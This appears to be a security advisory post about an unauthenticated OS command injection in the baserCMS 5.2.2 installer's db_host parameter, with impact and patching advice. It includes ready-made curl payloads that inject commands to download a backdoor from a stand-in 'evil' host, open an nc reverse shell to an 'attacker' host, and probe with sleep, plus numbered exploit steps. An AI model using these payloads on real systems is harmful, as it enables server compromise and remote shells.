Listen to this Post
The vulnerability stems from improper sanitization of user-supplied input during the installation process of baserCMS versions 5.2.2 and earlier. When the application is deployed on a server but not yet installed, the installer script exposes a setup endpoint that accepts parameters used to configure database connections, administrator credentials, and site metadata. Specifically, the installer fails to validate or escape the values passed for the database host or other configuration fields before incorporating them into system calls that execute shell commands. An attacker can send a crafted HTTP request to the unauthenticated installer interface, injecting arbitrary operating system commands via a semicolon, pipe, or command substitution in a parameter such as db_host. For instance, appending ; wget http://attacker.com/shell.sh` to the host value results in the injected command being executed with the privileges of the web server user. The command injection occurs because the installer uses `exec()` or similar PHP functions without adequate filtering, concatenating user input directly into a shell command string. This allows a remote, unauthenticated adversary to achieve arbitrary command execution on the underlying server, leading to full compromise before the CMS is even set up. The issue was discovered by REN XINGDIAN and addressed in later versions after responsible disclosure. Because the installer is accessible before any authentication mechanism is active, the attack surface is particularly dangerous in default deployments where the CMS directory is exposed.
Platform: baserCMS
Version: 5.2.2 earlier
Vulnerability: OS Command Injection
Severity: Critical
date: Mar 31, 2026
<h2 style="color: blue;">Prediction: Patch released Mar 31, 2026</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Simulate injection via curl curl -X POST http://target/baser/install/index \ -d "db_host=localhost; wget -O /tmp/backdoor http://evil/shell.php" \ -d "db_user=root" -d "db_pass=pass" Reverse shell payload curl -X POST http://target/baser/install/index \ -d "db_host=localhost; nc -e /bin/sh attacker 4444" Verify command execution using sleep curl -X POST http://target/baser/install/index \ -d "db_host=localhost; sleep 10"
<h2 style="color: blue;">Exploit:</h2>
1. Identify a baserCMS instance that has not completed installation (e.g., accessible installer at/install`).
2. Send a POST request to the installer endpoint with a malicious `db_host` parameter containing a command separator followed by an arbitrary OS command.
3. The injected command executes under the web server user, granting remote code execution.
4. Attackers can chain commands to upload webshells, establish reverse shells, or enumerate the environment.
Protection from this CVE:
- Immediately upgrade to baserCMS version 5.2.3 or later where the installer properly sanitizes input using escapeshellarg and avoids direct system calls.
- If immediate upgrade is not possible, remove or restrict access to the installer directory (e.g., via `.htaccess` or firewall rules) until the upgrade is applied.
- Ensure the web server runs with minimal privileges to limit impact.
Impact:
- Full remote code execution (RCE) without authentication.
- Complete server compromise, data exfiltration, and potential lateral movement within the network.
- Unauthorized administrative access to the CMS once installation is completed by the attacker.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

